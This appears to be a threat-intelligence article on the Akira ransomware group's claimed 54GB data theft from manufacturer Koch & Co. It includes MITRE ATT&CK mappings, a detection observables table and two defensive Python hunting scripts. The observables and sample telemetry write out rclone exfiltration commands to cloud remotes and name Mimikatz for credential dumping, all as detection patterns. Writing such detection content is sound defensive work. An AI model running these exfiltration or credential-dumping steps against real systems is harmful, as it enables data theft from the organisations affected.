Akira Ransomware Group Claims Cyberattack on Koch & Co., Allegedly Stealing 54GB of Financial and HR Data

Akira Ransomware Hits US Manufacturer Koch & Co., Threatens to Leak 54GB of Data

Severity: HIGH
Published: November 10, 2025
Reading time: 5 min
Topics: Ransomware, Data Breach, Cyberattack

Impact Scope

Affected Companies: Koch & Co., Inc.
Industries Affected: Manufacturing
Geographic Impact: United States (national)

Related Entities

Threat Actors: Akira ransomware
Other: Koch & Co., Inc.

Full Report

Executive Summary

The Akira ransomware group has claimed responsibility for a cyberattack against Koch & Co., Inc., a U.S.-based manufacturer of wood doors and cabinets. On November 7, 2025, the group posted the company's name on its dark web leak site, alleging the theft of 54GB of sensitive data. The threat actors are employing a double-extortion tactic, threatening to release the exfiltrated data—which they claim includes financial records, contracts, and HR files—if their ransom demands are not met. This incident underscores Akira's continued focus on targeting manufacturing and other mid-sized enterprises, leveraging data exfiltration as a primary tool for coercing victims into payment.


Threat Overview

  • Threat Actor: Akira is a well-established ransomware-as-a-service (RaaS) operation known for its distinctive retro-themed leak site and aggressive tactics. They have been active since early 2023 and are known to target a wide range of industries, with a particular focus on manufacturing, education, and professional services.
  • Malware: The Akira ransomware is written in C++ and is known for its ability to encrypt a wide variety of file types, appending a .akira extension to encrypted files. The group also uses a Linux variant to target VMware ESXi servers.
  • Attack Pattern: Akira typically follows a standard double-extortion model:
    1. Initial Access: Often gained through compromised credentials for VPNs without multi-factor authentication, or by exploiting known vulnerabilities (e.g., in Cisco ASA devices). This aligns with T1133 - External Remote Services.
    2. Lateral Movement and Discovery: Once inside, they use tools like Mimikatz for credential harvesting (T1003 - OS Credential Dumping) and PsExec for lateral movement.
    3. Data Exfiltration: Before deploying ransomware, they exfiltrate large volumes of sensitive data to be used as leverage, typically with off-the-shelf tools such as Rclone or WinSCP pushing archives to attacker-controlled cloud storage (T1567.002 - Exfiltration to Cloud Storage).
    4. Impact: Finally, they deploy the ransomware to encrypt systems across the network (T1486 - Data Encrypted for Impact).

Technical Analysis

In the attack on Koch & Co., Akira claims to have stolen 54GB of highly sensitive data. This suggests they had prolonged, privileged access to the network, allowing them to identify and stage critical data from file servers, financial systems, and HR databases. The types of data claimed—financials, contracts, and HR files—are specifically chosen to maximize pressure on the victim company, as their public release could cause severe reputational damage, regulatory penalties, and competitive disadvantage.

While the specific initial access vector for this attack is unknown, Akira's known TTPs provide a strong basis for defense and detection. Their heavy reliance on credential abuse makes strong authentication controls a critical defense.

MITRE ATT&CK Techniques Associated with Akira

Tactic            | Technique ID | Name                           | Description
Initial Access    | T1133        | External Remote Services       | Exploiting VPNs without MFA is a common entry point.
Credential Access | T1003        | OS Credential Dumping          | Using tools like Mimikatz to harvest credentials.
Lateral Movement  | T1570        | Lateral Tool Transfer          | Moving tools like PsExec and AnyDesk across the network.
Exfiltration      | T1567.002    | Exfiltration to Cloud Storage  | Using tools like Rclone or WinSCP to upload data to cloud services.
Impact            | T1486        | Data Encrypted for Impact      | The final ransomware deployment stage.

Impact Assessment

If Akira's claims are true, Koch & Co. faces severe consequences:

  • Operational Disruption: If systems were encrypted, manufacturing and business operations could be halted for an extended period, leading to significant revenue loss.
  • Data Breach Notification Costs: The company may be legally required to notify all employees and potentially customers whose data was compromised, incurring costs for credit monitoring and legal services.
  • Reputational Damage: The public leak of sensitive financial and HR data can damage the company's reputation with employees, partners, and customers.
  • Financial Loss: Beyond the potential ransom payment, the costs of incident response, system recovery, and security upgrades will be substantial.

Cyber Observables for Detection

To hunt for Akira activity, security teams should look for the following:

Type                 | Value                                                     | Description                                                                              | Context
file_name            | akira_readme.txt                                          | The standard name of the ransom note dropped by Akira.                                   | EDR, file system monitoring
file_name            | *.akira                                                   | The file extension appended to files encrypted by the ransomware.                        | EDR, file system monitoring
process_name         | AnyDesk.exe                                               | Akira has been observed using the legitimate remote access tool AnyDesk for persistence. | Process creation logs, EDR alerts
command_line_pattern | rclone.exe copy /path/to/data remote:bucket               | The use of Rclone to exfiltrate data to a cloud storage provider.                        | Process creation logs (Event ID 4688)
registry_key         | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Client | A registry key Akira has been known to use for persistence.                              | Registry monitoring, EDR

Two caveats apply when operationalising these: AnyDesk and Rclone are legitimate tools, so alert on them only where they are not sanctioned or appear on hosts that have no business running them, and Event ID 4688 only carries the command line if the "Include command line in process creation events" audit policy is enabled.
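The following Python script is an added example, not code from the original article or from any vendor, showing how the observables in the table above can be matched against constructed Windows telemetry. The event dictionaries, their field names ("type", "host", "Image", "CommandLine", "TargetFilename", "TargetObject") and the sample data are assumptions for illustration rather than a specific SIEM or EDR schema.

```python
"""Hunt the Akira observables from the table above across constructed Windows
telemetry. Field names and sample events are assumptions for this example,
not a particular SIEM or EDR export format."""
import fnmatch
import re
import shlex

RANSOM_NOTE = "akira_readme.txt"
ENCRYPTED_GLOB = "*.akira"
# Tools the article reports Akira abusing; alert only where they are not
# sanctioned (AnyDesk) or never expected at all (mimikatz). Renamed binaries
# will not match on image name alone and need hash or behavioural coverage.
SUSPECT_PROCESSES = {"anydesk.exe", "mimikatz.exe"}
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Client"
# An rclone remote is written "name:path". Require two or more characters so
# a Windows drive path such as D:\Finance is not mistaken for a remote.
RCLONE_REMOTE = re.compile(r"^[A-Za-z0-9_-]{2,}:")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_process(ev):
    image = _basename(ev.get("Image", ""))
    if image in SUSPECT_PROCESSES:
        return f"suspect tool executed: {image}"
    if image == "rclone.exe":
        cmd = ev.get("CommandLine", "")
        try:
            args = shlex.split(cmd, posix=False)  # keep backslashes intact
        except ValueError:
            args = cmd.split()
        # rclone copy|sync|move <local> <remote:path> means data leaving the host
        if len(args) > 2 and args[1].lower() in {"copy", "sync", "move"}:
            dest = next((a for a in args[2:] if RCLONE_REMOTE.match(a)), None)
            if dest:
                return f"rclone {args[1].lower()} to remote {dest}"
    return None


def match_file(ev):
    name = _basename(ev.get("TargetFilename", ""))
    if name == RANSOM_NOTE:
        return "Akira ransom note written"
    if fnmatch.fnmatch(name, ENCRYPTED_GLOB):
        return "file written with .akira extension"
    return None


def match_registry(ev):
    if ev.get("TargetObject", "").lower() == RUN_KEY.lower():
        return "Run key persistence value 'Client' set"
    return None


HANDLERS = {"process": match_process, "file": match_file, "registry": match_registry}


def hunt(events):
    """Return (host, reason) pairs for every event that matches an observable."""
    hits = []
    for ev in events:
        handler = HANDLERS.get(ev.get("type"))
        reason = handler(ev) if handler else None
        if reason:
            hits.append((ev.get("host", "?"), reason))
    return hits


# Constructed sample telemetry: five true positives mixed with benign noise.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"type": "process", "host": "ws01", "Image": r"C:\Users\bob\AppData\Local\AnyDesk.exe", "CommandLine": "AnyDesk.exe --service"},
    {"type": "process", "host": "fs01", "Image": r"C:\Temp\rclone.exe", "CommandLine": r"rclone.exe copy D:\Finance mega:exfil -q"},
    {"type": "process", "host": "fs01", "Image": r"C:\Tools\rclone.exe", "CommandLine": r"rclone.exe copy D:\Finance E:\Backup"},
    {"type": "file", "host": "fs01", "TargetFilename": r"D:\Finance\akira_readme.txt"},
    {"type": "file", "host": "fs01", "TargetFilename": r"D:\Finance\Q3_budget.xlsx.akira"},
    {"type": "file", "host": "fs01", "TargetFilename": r"D:\Finance\Q3_budget.xlsx"},
    {"type": "registry", "host": "ws01", "TargetObject": RUN_KEY},
    {"type": "registry", "host": "ws01", "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
]

if __name__ == "__main__":
    for host, reason in hunt(SAMPLE_EVENTS):
        print(f"{host}: {reason}")
```

The local-to-local rclone copy and the OneDrive Run value are deliberately left unmatched: a Rclone detection that fires on every invocation, or a Run-key rule that fires on every autostart entry, gets tuned out within a week. One encryption run produces thousands of .akira file events, so in production aggregate hits per host before paging anyone.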

Detection & Response

  1. Monitor for Credential Dumping: Deploy EDR rules to detect the execution of Mimikatz or access to the LSASS process memory (Sysmon Event ID 10 with lsass.exe as the target process is the usual telemetry). This is a key precursor to Akira's lateral movement and is a form of D3FEND's D3-PA: Process Analysis.
  2. Analyze VPN Logs: Scrutinize VPN authentication logs for suspicious activity, such as logins from unusual locations, multiple failed attempts followed by a success, or use of accounts for employees who do not normally use VPNs. This relates to D3FEND's D3-UGLPA: User Geolocation Logon Pattern Analysis.
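As an added example (not from the original article), the script below implements the VPN log checks in step 2: a run of failed attempts followed by a success, a success from a country the user has never logged in from, and a success by an account with no VPN history. The log line format, the regular expression, the per-user country baseline and the sample log are constructed assumptions; a real appliance needs its own parser.

```python
"""Analyse VPN authentication logs for the patterns in step 2 above. The line
format, the regex and the BASELINE table are constructed assumptions for this
example, not the format of any particular VPN product."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}) vpn auth (?P<result>OK|FAIL) "
    r"user=(?P<user>\S+) src=(?P<ip>\S+) geo=(?P<geo>[A-Z]{2})$"
)

# Countries each user has successfully logged in from recently (constructed;
# in practice derived from the last 90 days of successful logons). A user
# absent from the table has never used the VPN.
BASELINE = {"jsmith": {"US"}, "mchen": {"US", "CA"}}

FAIL_THRESHOLD = 5                  # failures before a success is suspicious
FAIL_WINDOW = timedelta(minutes=10)  # how far back failures still count


def parse(lines):
    """Parse recognised lines into dicts, oldest first; unmatched lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "user": m["user"],
                           "ok": m["result"] == "OK", "ip": m["ip"], "geo": m["geo"]})
    return sorted(events, key=lambda e: e["ts"])


def analyse(lines):
    """Return (user, finding, src_ip) alerts raised on successful logons."""
    alerts = []
    failures = defaultdict(list)  # user -> timestamps of failures not yet followed by success
    for e in parse(lines):
        user = e["user"]
        if not e["ok"]:
            failures[user].append(e["ts"])
            continue
        recent = [t for t in failures[user] if e["ts"] - t <= FAIL_WINDOW]
        failures[user] = []  # a success closes the run of failures
        if len(recent) >= FAIL_THRESHOLD:
            alerts.append((user, f"{len(recent)} failures then success within {FAIL_WINDOW}", e["ip"]))
        known = BASELINE.get(user)
        if known is None:
            alerts.append((user, "account with no VPN history logged in", e["ip"]))
        elif e["geo"] not in known:
            alerts.append((user, f"logon from new country {e['geo']}", e["ip"]))
    return alerts


# Constructed sample log: one brute-force-then-success from a new country,
# one benign typo-then-success, one service account that never used the VPN.
SAMPLE_LOG = """\
2025-11-01T08:00:00 vpn auth OK user=jsmith src=203.0.113.10 geo=US
2025-11-01T08:10:00 vpn auth FAIL user=mchen src=198.51.100.7 geo=NL
2025-11-01T08:11:00 vpn auth FAIL user=mchen src=198.51.100.7 geo=NL
2025-11-01T08:12:00 vpn auth FAIL user=mchen src=198.51.100.7 geo=NL
2025-11-01T08:13:00 vpn auth FAIL user=mchen src=198.51.100.7 geo=NL
2025-11-01T08:14:00 vpn auth FAIL user=mchen src=198.51.100.7 geo=NL
2025-11-01T08:15:00 vpn auth OK user=mchen src=198.51.100.7 geo=NL
2025-11-01T09:00:00 vpn auth FAIL user=jsmith src=203.0.113.10 geo=US
2025-11-01T09:00:30 vpn auth OK user=jsmith src=203.0.113.10 geo=US
2025-11-01T22:30:00 vpn auth OK user=svc_backup src=203.0.113.55 geo=US
this line is not an auth record and is ignored
""".splitlines()

if __name__ == "__main__":
    for user, finding, ip in analyse(SAMPLE_LOG):
        print(f"{user} from {ip}: {finding}")
```

Failures that are never followed by a success raise nothing here; that is deliberate, since the point is to catch the compromised credential that got in, but a separate threshold on raw failure volume per source IP is worth running alongside it. The second finding for mchen (new country) is what an MFA-less VPN gives you no other way to see, which is why the mitigation section leads with MFA.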

Timeline of Events

1. November 7, 2025: Akira ransomware group posts Koch & Co., Inc. on its dark web leak site.
2. November 10, 2025: This article was published.

MITRE ATT&CK Mitigations

  • M1032 Multi-factor Authentication: Enforce MFA on all VPN and remote access services to mitigate initial access via compromised credentials.
  • M1049 Antivirus/Antimalware: Use EDR/AV solutions to detect and block known Akira payloads and associated tools.
  • M1030 Network Segmentation: Segment networks to limit the lateral movement of ransomware and protect critical assets like backup servers.


Sources & References

Akira Ransomware Attacks Koch & Co, Inc. - DeXpose (dexpose.io), November 10, 2025

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Akira, Ransomware, Data Breach, Manufacturing, Double Extortion
